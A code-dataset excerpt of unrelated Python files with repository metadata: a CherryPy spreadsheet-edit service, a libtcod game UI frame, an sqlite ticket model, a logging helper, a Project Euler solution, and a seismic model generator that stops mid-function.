afb72313350393f8a23c317a77df8ed5c429197d | 1,880 | py | Python | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | python_utility/spreadsheet/spreadsheet_service.py | FunTimeCoding/python-utility | e91df316684a07161aae33576329f9092d2e97e6 | [
"MIT"
] | null | null | null | import cherrypy
from gspread import CellNotFound
from python_utility.spreadsheet.simple_spreadsheet import SimpleSpreadsheet
class SpreadsheetService:
    """CherryPy application: spreadsheet search-and-replace plus status pages."""

    @staticmethod
    def read_status() -> str:
        """Return version, git hash, and build date as plain-text lines."""
        try:
            from python_utility.build import Build
        except ImportError:
            # TODO: Understand the best practice.
            from python_utility.build_undefined import Build  # type: ignore

        parts = [
            'Version: ' + Build.GIT_TAG,
            'Git hash: ' + Build.GIT_HASH,
            'Build date: ' + Build.BUILD_DATE,
        ]
        return '\n'.join(parts) + '\n'

    @cherrypy.expose
    def index(self):
        """Plain-text greeting endpoint."""
        cherrypy.response.headers['Content-Type'] = 'text/plain'
        return 'Hello friend.\n'

    @cherrypy.expose
    @cherrypy.tools.json_out()
    @cherrypy.tools.json_in()
    def spreadsheet(self):
        """Locate a cell by value and overwrite the cell x-offset columns right."""
        payload = cherrypy.request.json

        # Validate required fields in the same order the old code checked them.
        for required in ('search', 'replace', 'x-offset'):
            if required not in payload:
                return required + ' missing'

        sheet = SimpleSpreadsheet()
        sheet.connect()
        try:
            cell = sheet.search(payload['search'])
            sheet.edit_coordinates(
                cell.row,
                cell.col + int(payload['x-offset']),
                payload['replace'],
            )
            return 'Success'
        except CellNotFound as error:
            return 'Not found: ' + str(error)

    @cherrypy.expose
    def status(self):
        """Plain-text build/version status endpoint."""
        cherrypy.response.headers['Content-Type'] = 'text/plain'
        return self.read_status()
| 29.84127 | 76 | 0.567553 | 182 | 1,880 | 5.78022 | 0.39011 | 0.03327 | 0.048479 | 0.057034 | 0.10076 | 0.10076 | 0.10076 | 0.10076 | 0.10076 | 0 | 0 | 0 | 0.339362 | 1,880 | 62 | 77 | 30.322581 | 0.847021 | 0.025532 | 0 | 0.142857 | 0 | 0 | 0.109896 | 0 | 0 | 0 | 0 | 0.016129 | 0 | 1 | 0.081633 | false | 0 | 0.122449 | 0 | 0.306122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afb9b755dae183e4752a4214a72d422d99f88be0 | 2,774 | py | Python | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | 2 | 2015-09-07T10:35:12.000Z | 2015-09-12T05:55:29.000Z | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | null | null | null | ui/game/frame_libraries.py | RCIX/RogueP | a3522dae65e90c16986c6254254682789e010f9f | [
"MIT"
] | null | null | null | # added specifically to make floating point division apply to code in bar position calculation
from __future__ import division
import libtcodpy as libtcod
import xp_loader
import gzip
from vec2d import Vec2d
from model.attribute import AttributeTag
from ui.frame import Frame
from ui.ui_event import UIEvent, UIEventType
# Displays remaining and queued actions.
class FrameLibraries(Frame):
    # Draws the player's library slots over a background image loaded from a
    # REXPaint (.xp) file; slot positions come from color-keyed layer data.
    def __init__(self, root_console_width, root_console_height, frame_manager):
        self.entity_manager = frame_manager.parent_menu.entity_manager

        # load xp for bg
        console_bg_xp = gzip.open('assets\\ui\\ui_frame_libraries_bg.xp')
        self.bg_data = xp_loader.load_xp_string(console_bg_xp.read())
        Frame.__init__(self, root_console_width, root_console_height, self.bg_data['width'], self.bg_data['height'], frame_manager)

        # Red/green position keys in layer 1 mark where the library lines
        # start and how far they extend horizontally.
        library_start_xy = xp_loader.get_position_key_xy(self.bg_data['layer_data'][1], xp_loader.poskey_color_red)
        self.library_start_xy = Vec2d(library_start_xy[0], library_start_xy[1])
        self.library_line_extent = xp_loader.get_position_key_xy(self.bg_data['layer_data'][1], xp_loader.poskey_color_green)

        #TODO put these in config somewhere
        self.line_char = chr(196)  # character code used to draw the slot line
        self.line_bg = libtcod.Color(2, 22, 12)
        self.line_fg = libtcod.Color(6, 130, 60)
        self.libname_fg = libtcod.Color(102, 255, 178)

        libtcod.console_set_default_background(self.console,self.line_bg)
        libtcod.console_set_default_foreground(self.console,self.libname_fg)
        libtcod.console_set_alignment(self.console, libtcod.LEFT)
        xp_loader.load_layer_to_console(self.console, self.bg_data['layer_data'][0])

    def handle_ui_event(self, event):
        # This frame is display-only; UI events are ignored.
        pass

    def draw(self):
        libtcod.console_clear(self.console)
        # Repaint the background layer each frame before drawing the slots.
        xp_loader.load_layer_to_console(self.console, self.bg_data['layer_data'][0])
        player_libraries = self.entity_manager.get_entity_by_id(self.entity_manager.player_id).get_attribute(AttributeTag.Libraries).data['value']
        # Exactly four slot rows are drawn, one per `lib` index.
        for lib in range(4):
            #+1 here because range will go up to but not including the final screen tile needed
            for x in range(self.library_line_extent[0] - self.library_start_xy[0] + 1):
                libtcod.console_put_char_ex(self.console, self.library_start_xy[0] + x, self.library_start_xy[1] + lib, self.line_char, self.line_fg, self.line_bg)
            libname_xy = Vec2d(self.library_start_xy[0], self.library_start_xy[1] + lib)
            #TODO: move to config strings
            libname = 'lib_missing'
            print_color = self.line_fg
            if len(player_libraries) > lib:
                # Slot is occupied: show the library's name in highlight color.
                print_color = self.libname_fg
                libname = player_libraries[lib].name
            libtcod.console_set_default_foreground(self.console, print_color)
            libtcod.console_print(self.console, libname_xy[0], libname_xy[1], libname)
        libtcod.console_blit(self.console, 0, 0, self.width, self.height, 0, 0, 0)
afbb04f2d4284cedd9e1ff7745fd2a724ccbc326 | 8,490 | py | Python | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | ticket/models/ticket.py | ifbhack/ticketsystem | f2732fe5665dd5e05ecc957446cd883c9c8d63e2 | [
"MIT"
] | null | null | null | import sqlite3
from typing import List, Iterable, Any
from ticket.models.user import User
# TODO: when we have a couple more errors, put them in a separate file
class UserAssignViolationError(Exception):
    """Raised when a user may not be assigned to a ticket.

    NOTE(review): not raised anywhere in this module yet.
    """


class TicketNotFoundError(Exception):
    """Raised when a requested ticket does not exist."""


class Ticket:
    """Plain data holder for a single row of the ``ticket`` table."""

    ticket_id: int = 0
    user_id: int = 0
    title: str = ""
    description: str = ""
    is_closed: bool = False
    tag: str = ""
    assigned_user_id: int = 0
    created_on: str = ""

    def __init__(self, ticket_id: int, user_id: int, title: str,
                 description: str, created_on: str,
                 is_closed: bool,
                 tag: str = "", assigned_user_id: int = 0):
        self.ticket_id = ticket_id
        self.user_id = user_id
        self.title = title
        self.description = description
        self.assigned_user_id = assigned_user_id
        self.tag = tag
        self.is_closed = is_closed
        self.created_on = created_on


class TicketModel:
    """Data-access layer for tickets backed by an sqlite3 connection."""

    # TODO: add sqlite error handling
    _db_conn: sqlite3.Connection

    def __init__(self, db_conn: sqlite3.Connection):
        self._db_conn = db_conn

    def open_ticket(self, user_id: int, title: str, description: str,
                    tag: str = "") -> Ticket:
        """open_ticket for a specified user. A ticket is open by default and
        the creation datetime is set automatically within the database.

        Returns a Ticket with the given data and new ticket id.
        Raises ValueError on an invalid user_id or empty title/description.
        """
        if user_id == 0:
            raise ValueError(f"user_id is invalid: got {user_id}")
        if title == "" or description == "":
            raise ValueError(f"title or description is an empty string: "
                             f"title: ({title}) description: ({description})")

        cursor = self._db_conn.cursor()
        # NOTE(joshturge): Since I'm running sqlite 3.34.* I don't have access
        # to RETURNING, so a second query fetches the creation date.
        # TODO: in the future utilise RETURNING
        # (https://www.sqlite.org/lang_returning.html)
        cursor.execute("""
        INSERT INTO
        ticket (user_id, ticket_title, ticket_description, ticket_tag, is_closed)
        VALUES (?, ?, ?, ?, 0)
        """, (user_id, title, description, tag))
        self._db_conn.commit()

        # Capture the rowid immediately: executing another statement may
        # invalidate cursor.lastrowid.
        ticket_id = cursor.lastrowid

        # Fetch the ticket_created_on datetime set by the database.
        cursor.execute("""
        SELECT
        ticket_created_on
        FROM ticket
        WHERE ticket_id = ?
        """, (ticket_id,))
        row = cursor.fetchone()
        # fetchone() returns a row tuple; unwrap the scalar (the original
        # stored the whole tuple in created_on).
        created_on = row[0] if row is not None else ""

        return Ticket(ticket_id, user_id, title, description,
                      created_on=created_on, is_closed=False, tag=tag)

    def __convert_ticket_row(self, row: List[Any]) -> Ticket:
        """Map a ``SELECT *`` row to a Ticket.

        Column order is (ticket_id, user_id, assigned_user_id, ticket_title,
        ticket_description, ticket_tag, is_closed, ticket_created_on).
        """
        return Ticket(row[0], row[1], row[3], row[4], row[7], row[6], row[5], row[2])

    def get_ticket(self, ticket_id: int) -> Ticket:
        """get_ticket with a given ticket_id.

        Raises TicketNotFoundError when no such ticket exists and ValueError
        on an invalid ticket_id.
        """
        if ticket_id == 0:
            raise ValueError(f"ticket_id is invalid: got {ticket_id}")

        cursor = self._db_conn.cursor()
        cursor.execute("""
        SELECT
        *
        FROM ticket
        WHERE ticket_id = ?
        """, (ticket_id,))
        row = cursor.fetchone()
        if row is None:
            raise TicketNotFoundError(f"ticket with ticket_id: {ticket_id} not found")
        return self.__convert_ticket_row(row)

    def __get_tickets(self, sqlquery: str, parameters: Iterable[Any],
                      limit: int = 0, offset: int = 0) -> List[Ticket]:
        """get_tickets from the database, given an sqlquery, applying the
        limit and offset. All tickets are returned by default with no offset.

        Returns a list of tickets, or raises TicketNotFoundError when no
        tickets are found.
        """
        # BUG FIX: the original appended " ORDER BY <offset>" here. SQLite
        # requires a LIMIT clause before OFFSET, so emit LIMIT -1 (unlimited)
        # when only an offset was requested. int() guards against injection.
        if limit != 0:
            sqlquery += " LIMIT " + str(int(limit))
        elif offset != 0:
            sqlquery += " LIMIT -1"
        if offset != 0:
            sqlquery += " OFFSET " + str(int(offset))

        cursor = self._db_conn.cursor()
        cursor.execute(sqlquery, parameters)
        rows = cursor.fetchall()
        if len(rows) == 0:
            raise TicketNotFoundError("no tickets were found")
        return [self.__convert_ticket_row(row) for row in rows]

    def get_tickets(self, limit: int = 0, offset: int = 0) -> List[Ticket]:
        """get_tickets from the database.

        All tickets are returned by default with no offset. Raises
        TicketNotFoundError when no tickets are found.
        """
        return self.__get_tickets("SELECT * FROM ticket", (), limit, offset)

    # TODO: change to get tickets via username instead of user_id
    def get_tickets_by_user(self, user_id: int, limit: int = 0,
                            offset: int = 0) -> List[Ticket]:
        """get_tickets_by_user from the database given a user_id.

        Raises ValueError on an invalid user_id and TicketNotFoundError when
        no tickets are found.
        """
        if user_id == 0:
            raise ValueError(f"invalid user_id: got {user_id}")
        return self.__get_tickets("SELECT * FROM ticket WHERE user_id = ?",
                                  (user_id,), limit, offset)

    def get_tickets_by_title(self, title: str, limit: int = 0,
                             offset: int = 0) -> List[Ticket]:
        """get_tickets_by_title given a title; matched via a LIKE pattern, so
        the text does not need to be exact.

        Raises TicketNotFoundError when no tickets are found.
        """
        return self.__get_tickets("SELECT * FROM ticket WHERE ticket_title LIKE ?",
                                  ('%' + title + '%',), limit, offset)

    def get_tickets_by_tag(self, tag: str, limit: int = 0,
                           offset: int = 0) -> List[Ticket]:
        """get_tickets_by_tag given a tag; matched via a LIKE pattern, so the
        text does not need to be exact.

        Raises TicketNotFoundError when no tickets are found.
        """
        return self.__get_tickets("SELECT * FROM ticket WHERE ticket_tag LIKE ?",
                                  ('%' + tag + '%',), limit, offset)

    def get_tickets_by_status(self, is_closed: bool,
                              limit: int = 0, offset: int = 0) -> List[Ticket]:
        """get_tickets_by_status given an open/closed status.

        Raises TicketNotFoundError when no tickets are found.
        """
        return self.__get_tickets("SELECT * FROM ticket WHERE is_closed = ?",
                                  (is_closed,), limit, offset)

    def assign_user(self, ticket_id: int, user_id: int):
        """assign_user to a specified ticket.

        Raises ValueError on an invalid ticket_id or user_id.
        """
        if ticket_id == 0:
            raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")
        elif user_id == 0:
            raise ValueError(f"user_id is invalid: got {user_id}")

        self._db_conn.execute("""
        UPDATE ticket
        SET assigned_user_id = ?
        WHERE
        ticket_id = ?
        """, (user_id, ticket_id))
        self._db_conn.commit()

    def add_tag(self, ticket_id: int, tag: str):
        """add_tag or replace the tag for a given ticket.

        Raises ValueError on an invalid ticket_id or empty tag.
        """
        if ticket_id == 0:
            raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")
        if tag == "":
            raise ValueError("tag is invalid: got empty string")

        self._db_conn.execute("""
        UPDATE ticket
        SET ticket_tag = ?
        WHERE
        ticket_id = ?
        """, (tag, ticket_id))
        self._db_conn.commit()

    def close_ticket(self, ticket_id: int):
        """close_ticket given a valid ticket to close.

        Raises ValueError on an invalid ticket_id.
        """
        if ticket_id == 0:
            raise ValueError(f"ticket.ticket_id is invalid: got {ticket_id}")

        self._db_conn.execute("""
        UPDATE ticket
        SET is_closed = 1
        WHERE
        ticket_id = ?
        """, (ticket_id,))
        self._db_conn.commit()
| 35.375 | 101 | 0.595289 | 1,083 | 8,490 | 4.486611 | 0.151431 | 0.054332 | 0.024696 | 0.025931 | 0.491665 | 0.433011 | 0.416958 | 0.338753 | 0.310352 | 0.310352 | 0 | 0.007181 | 0.311072 | 8,490 | 239 | 102 | 35.523013 | 0.82356 | 0.25265 | 0 | 0.330882 | 0 | 0 | 0.234134 | 0 | 0 | 0 | 0 | 0.012552 | 0 | 1 | 0.102941 | false | 0.014706 | 0.022059 | 0.007353 | 0.286765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
afca1db73f5dd21162208565c2d96e8c65eb7797 | 302 | py | Python | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | 2 | 2016-10-04T15:35:27.000Z | 2017-12-29T00:42:30.000Z | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | null | null | null | safeness/glad/logger.py | pasmod/obfuscation-pan2016 | 410a3bb1e6827e256b0de1927e185f7e213417bf | [
"MIT"
] | null | null | null | import logging
def setup_logging(level):
    """Configure root logging and return this module's logger.

    :param level: logging.INFO or logging.DEBUG, etc.
    """
    fmt = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
    logging.basicConfig(level=level, format=fmt)
    return logging.getLogger(__name__)
# Module-level logger, configured at DEBUG level as a side effect of import.
log = setup_logging(logging.DEBUG)
| 21.571429 | 99 | 0.675497 | 38 | 302 | 5.210526 | 0.578947 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172185 | 302 | 13 | 100 | 23.230769 | 0.792 | 0.201987 | 0 | 0 | 0 | 0 | 0.231111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
afd2d13f2d1a9355e7d128182b7544c5883c7157 | 738 | py | Python | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | python/p043.py | lbreede/project-euler | c225e3742f749fc681034aac98cc9c23f8cdb37e | [
"MIT"
] | null | null | null | # Sub-string divisibility
from itertools import permutations
def sub_string(num, start, rng):
    """Return the integer formed by ``rng`` consecutive digits of ``num``.

    ``start`` is 1-based. ``num`` may be a digit string or an int
    (generalized from the original, which required a string).
    """
    digits = str(num)
    begin = start - 1
    return int(digits[begin:begin + rng])


def check_properties(num):
    """Check the Project Euler #43 sub-string divisibility properties.

    Returns a list of seven booleans: entry i is True when the 3-digit
    sub-string starting at 1-based position i+2 of ``num`` is divisible by
    the i-th prime of (2, 3, 5, 7, 11, 13, 17). The original spelled out
    the seven checks by hand; a loop removes the duplication.
    """
    primes = (2, 3, 5, 7, 11, 13, 17)
    return [sub_string(num, pos, 3) % p == 0
            for pos, p in enumerate(primes, start=2)]
nums = "1234567890"

# Sum every 0-9 pandigital number satisfying the sub-string divisibility
# property. Iterating permutations lazily avoids materializing two
# ~3.6M-element lists, and no longer shadows itertools.permutations with
# a list of the same name.
result = 0
for perm in permutations(nums):
    candidate = ''.join(perm)
    if all(check_properties(candidate)):
        result += int(candidate)
print(result) | 23.0625 | 69 | 0.639566 | 123 | 738 | 3.756098 | 0.398374 | 0.175325 | 0.207792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096939 | 0.203252 | 738 | 32 | 70 | 23.0625 | 0.688776 | 0.055556 | 0 | 0 | 0 | 0 | 0.014388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.045455 | 0 | 0.227273 | 0.045455 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb622b8ab8684bdbfde028be9a16fbda5516343e | 20,738 | py | Python | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 7 | 2020-08-17T19:47:21.000Z | 2022-03-29T08:02:51.000Z | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 6 | 2020-01-28T22:17:17.000Z | 2022-02-09T23:31:59.000Z | vrmslearn/ModelGenerator.py | GeoCode-polymtl/Deep_1D_velocity | 8f42fc4f5c984d0e11b4c93ae7eee99ba3843b4c | [
"MIT"
] | 4 | 2019-11-27T06:05:31.000Z | 2021-10-08T00:38:38.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Class to generate seismic models and labels for training.
"""
import numpy as np
import copy
from scipy.signal import gaussian
from scipy.interpolate import interp1d
import argparse
from vrmslearn.ModelParameters import ModelParameters
class ModelGenerator(object):
    """
    Generate a seismic model with the generate_model method and output the
    labels with generate_labels. As of now, this class generates a 1D layered
    model, and the labels correspond to the rms velocity.
    """

    def __init__(self, model_parameters=None):
        """
        Constructor.

        @params:
        model_parameters (ModelParameters): Parameters for model generation.
            Defaults to a fresh ModelParameters() per instance. (The original
            used ``model_parameters=ModelParameters()`` — a mutable default
            argument evaluated once and shared by every ModelGenerator.)

        @returns:
        """
        self.pars = model_parameters if model_parameters is not None \
            else ModelParameters()
        # Last generated vp model; set by generate_model().
        self.vp = None

    def generate_model(self):
        """
        Output the media parameters required for seismic modelling, in this
        case vp, vs and rho. To create a 1D model, set pars.flat to True. For
        2D dipping layer models, set it to False.

        @params:

        @returns:
        vp (numpy.ndarray)  : (self.pars.NZ, self.pars.NX) array for vp.
        vs (numpy.ndarray)  : (self.pars.NZ, self.pars.NX) array for vs.
        rho (numpy.ndarray) : (self.pars.NZ, self.pars.NX) array for rho.
        """
        if self.pars.flat:
            vp, vs, rho = generate_random_1Dlayered(self.pars)
        else:
            vp, vs, rho, _, _, _ = generate_random_2Dlayered(self.pars)
        # Keep a copy so generate_labels() can be called afterwards.
        self.vp = copy.copy(vp)
        return vp, vs, rho

    def generate_labels(self):
        """
        Output the labels attached to modelling of a particular dataset. In
        this case, we want to predict vrms from a cmp gather. Must be called
        after generate_model(), which sets self.vp.

        @params:

        @returns:
        vrms (numpy.ndarray)  : shape (self.pars.NT,), vrms normalized to
                                [0, 1] by (vp_min, vp_max).
        valid (numpy.ndarray) : shape (self.pars.NT,), 1 before the last
                                reflection, 0 afterwards.
        refs (numpy.ndarray)  : Two-way travel-times of the reflections.
        """
        vp = self.vp[:, 0]
        vrms = calculate_vrms(vp,
                              self.pars.dh,
                              self.pars.Npad,
                              self.pars.NT,
                              self.pars.dt,
                              self.pars.tdelay,
                              self.pars.source_depth)
        refs = generate_reflections_ttime(vp, self.pars)

        # Normalize so the labels are between 0 and 1
        vrms = (vrms - self.pars.vp_min) / (self.pars.vp_max - self.pars.vp_min)
        # Mark everything after the last labelled reflection as invalid.
        indt = np.argwhere(refs > 0.1).flatten()[-1]
        valid = np.ones(len(vrms))
        valid[indt:] = 0

        return vrms, valid, refs
def calculate_vrms(vp, dh, Npad, NT, dt, tdelay, source_depth):
    """
    This method inputs vp and outputs the vrms. The convention used is that
    the velocity denoted by the interval (i, i+1) grid points is given by the
    constant vp[i+1]. Source and receiver depths are assumed equal.

    @params:
    vp (numpy.ndarray) : 1D vp values in meters/sec.
    dh (float)   : the spatial grid size
    Npad (int)   : Number of absorbing padding grid points over the source
    NT (int)     : Number of time steps of output
    dt (float)   : Time step of the output
    tdelay (float): Time before source peak (assumed >= dt; t0 below must be
                    at least 1 or the final shift slices break — TODO confirm)
    source_depth (float) : The source depth in meters

    @returns:
    vrms (numpy.ndarray) : numpy array of shape (NT, ) with vrms
                           values in meters/sec.
    """
    NZ = vp.shape[0]

    # Create a numpy array of depths corresponding to the vp grid locations
    depth = np.zeros((NZ,))
    for i in range(NZ):
        depth[i] = i * dh

    # Create a list of tuples of (relative depths, velocity) of the layers
    # following the depth of the source / receiver depths, till the last layer
    # before the padding zone at the bottom
    last_depth = dh * (NZ - Npad - 1)
    rdepth_vel_pairs = [(d - source_depth, vp[i]) for i, d in enumerate(depth)
                        if d > source_depth and d <= last_depth]
    first_layer_vel = rdepth_vel_pairs[0][1]
    rdepth_vel_pairs.insert(0, (0.0, first_layer_vel))

    # Calculate a list of two-way travel times across each interval
    t = [2.0 * (rdepth_vel_pairs[index][0] - rdepth_vel_pairs[index - 1][
        0]) / vel
         for index, (_, vel) in enumerate(rdepth_vel_pairs) if index > 0]
    t.insert(0, 0.0)
    # Convert interval times to cumulative two-way times, in place.
    total_time = 0.0
    for i, time in enumerate(t):
        total_time += time
        t[i] = total_time

    # The last time must be 'dt' * 'NT', so adjust the lists 'rdepth_vel_pairs'
    # and 't' by cropping and adjusting the last sample accordingly
    rdepth_vel_pairs = [(rdepth_vel_pairs[i][0], rdepth_vel_pairs[i][1]) for
                        i, time in enumerate(t)
                        if time <= NT * dt]
    t = [time for time in t if time <= NT * dt]
    last_index = len(t) - 1
    # Extra distance travelled at the last velocity in the remaining time.
    extra_distance = (NT * dt - t[last_index]) * rdepth_vel_pairs[last_index][
        1] / 2.0
    rdepth_vel_pairs[last_index] = (
        extra_distance + rdepth_vel_pairs[last_index][0],
        rdepth_vel_pairs[last_index][1])
    t[last_index] = NT * dt

    # Compute vrms at the times in t:
    # vrms(t_i) = sqrt( sum_j (t_j - t_{j-1}) * v_j^2 / t_i )
    vrms = [first_layer_vel]
    sum_numerator = 0.0
    for i in range(1, len(t)):
        sum_numerator += (t[i] - t[i - 1]) * rdepth_vel_pairs[i][1] * \
                         rdepth_vel_pairs[i][1]
        vrms.append((sum_numerator / t[i]) ** 0.5)

    # Interpolate vrms to a uniform time grid of NT samples.
    tgrid = np.asarray(range(0, NT)) * dt
    vrms = np.interp(tgrid, t, vrms)
    vrms = np.reshape(vrms, [-1])

    # Adjust for time delay: shift the trace down by t0 samples and pad the
    # top with the first value.
    t0 = int(tdelay / dt)
    vrms[t0:] = vrms[:-t0]
    vrms[:t0] = vrms[t0]

    # Return vrms
    return vrms
def generate_random_1Dlayered(pars, seed=None):
    """Generate a random 1D layered model (constant along X).

    @params:
    pars (ModelParameters): Parameters controlling layer count, thickness,
                            velocity and density ranges.
    seed (int)            : Optional seed for numpy's global RNG.

    @returns:
    vp, vs, rho (numpy.ndarray): arrays of shape (pars.NZ, pars.NX); vs is
                                 zero, rho is constant unless pars.rho_var.
    """
    if seed is not None:
        np.random.seed(seed)

    # Choose the number of layers (random when pars.num_layers == 0).
    if pars.num_layers == 0:
        nmin = pars.layer_dh_min
        nmax = int(pars.NZ / pars.layer_num_min)
        n_layers = np.random.choice(range(pars.layer_num_min, int(pars.NZ / nmin)))
    else:
        nmin = pars.layer_dh_min
        nmax = int(pars.NZ / pars.layer_num_min)
        n_layers = int(np.clip(pars.num_layers, nmin, nmax))

    NZ = pars.NZ
    NX = pars.NX
    dh = pars.dh
    top_min = int(pars.source_depth / dh + 2 * pars.layer_dh_min)

    # Random layer thicknesses (in grid cells). BUG FIX: np.int was removed
    # in NumPy 1.24; the builtin int is the documented replacement.
    layers = (nmin + np.random.rand(n_layers) * (nmax - nmin)).astype(int)
    tops = np.cumsum(layers)
    # Merge every layer lying above top_min into a single top layer so the
    # velocity above the source stays constant.
    ntos = np.sum(layers[tops <= top_min])
    if ntos > 0:
        layers = np.concatenate([[ntos], layers[tops > top_min]])

    # Random layer velocities, biased to increase with depth via a ramp.
    vels = (pars.vp_min
            + np.random.rand() * (pars.vp_max - pars.vp_min - pars.dvmax)
            + np.random.rand(len(layers)) * pars.dvmax)
    ramp = np.abs(np.max(vels) - pars.vp_max) * np.random.rand() + 0.1
    vels = vels + np.linspace(0, ramp, vels.shape[0])
    vels[vels > pars.vp_max] = pars.vp_max
    vels[vels < pars.vp_min] = pars.vp_min
    if pars.marine:
        # First layer is water with randomized velocity and depth.
        vels[0] = pars.velwater + (np.random.rand() - 0.5) * 2 * pars.d_velwater
        layers[0] = int(pars.water_depth / pars.dh + (
            np.random.rand() - 0.5) * 2 * pars.dwater_depth / pars.dh)

    # Expand layers into a 1D velocity profile and pad/crop to NZ cells.
    vel1d = np.concatenate([np.ones(layers[n]) * vels[n]
                            for n in range(len(layers))])
    if len(vel1d) < NZ:
        vel1d = np.concatenate([vel1d, np.ones(NZ - len(vel1d)) * vel1d[-1]])
    elif len(vel1d) > NZ:
        vel1d = vel1d[:NZ]

    if pars.rho_var:
        # Random densities built the same way as the velocities.
        rhos = (pars.rho_min
                + np.random.rand() * (
                    pars.rho_max - pars.rho_min - pars.drhomax)
                + np.random.rand(len(layers)) * pars.drhomax)
        ramp = np.abs(np.max(rhos) - pars.rho_max) * np.random.rand() + 0.1
        rhos = rhos + np.linspace(0, ramp, rhos.shape[0])
        rhos[rhos > pars.rho_max] = pars.rho_max
        rhos[rhos < pars.rho_min] = pars.rho_min
        rho1d = np.concatenate([np.ones(layers[n]) * rhos[n]
                                for n in range(len(layers))])
        if len(rho1d) < NZ:
            rho1d = np.concatenate(
                [rho1d, np.ones(NZ - len(rho1d)) * rho1d[-1]])
        elif len(rho1d) > NZ:
            rho1d = rho1d[:NZ]
    else:
        rho1d = vel1d * 0 + pars.rho_default

    # Tile the 1D profiles across NX columns.
    vp = np.transpose(np.tile(vel1d, [NX, 1]))
    vs = vp * 0
    rho = np.transpose(np.tile(rho1d, [NX, 1]))

    return vp, vs, rho
def texture_1lay(NZ, NX, lz=2, lx=2):
    """
    Create a random model texture from bandwidth-limited noise,
    normalized so its maximum value is 1.

    @params:
    NZ (int): Number of cells in Z
    NX (int): Number of cells in X
    lz (int): High frequency cut-off size in z
    lx (int): High frequency cut-off size in x

    @returns:
    (numpy.ndarray): (NZ, NX) array of band-limited noise.
    """
    # White noise in the frequency domain.
    spectrum = np.fft.fft2(np.random.random([NZ, NX]))
    # Zero the first and last row/column of the spectrum.
    spectrum[0, :] = 0
    spectrum[:, 0] = 0
    spectrum[-1, :] = 0
    spectrum[:, -1] = 0
    # Gaussian masks, rolled by half the window length along each axis.
    mask_z = np.roll(gaussian(NZ, lz), [int(NZ / 2), 0])
    mask_x = np.roll(gaussian(NX, lx), [int(NX / 2), 0])
    # Apply the separable mask: columns first, then rows.
    spectrum = spectrum * np.reshape(mask_z, [-1, 1])
    spectrum *= mask_x
    # Back to the spatial domain and normalize by the maximum.
    field = np.real(np.fft.ifft2(spectrum))
    return field / np.max(field)
def generate_reflections_ttime(vp,
                               pars,
                               tol=0.015,
                               window_width=0.45):
    """
    Output the reflection travel time at the minimum offset of a CMP gather

    @params:
    vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
    pars (ModelParameter): Parameters used to generate the model
    tol (float): The minimum relative velocity change to consider a reflection
    window_width (float): time window width in fraction of 1/pars.peak_freq

    @returns:
    tlabel (numpy.ndarray) : A 1D array of pars.NT elements with 1 at
                             reflection times +- window_width/pars.peak_freq,
                             0 elsewhere
    """
    # Discard everything above the source depth.
    vp = vp[int(pars.source_depth / pars.dh):]
    vlast = vp[0]
    ind = []
    # Indices of the cell just above each interface where the relative
    # velocity change exceeds tol.
    for ii, v in enumerate(vp):
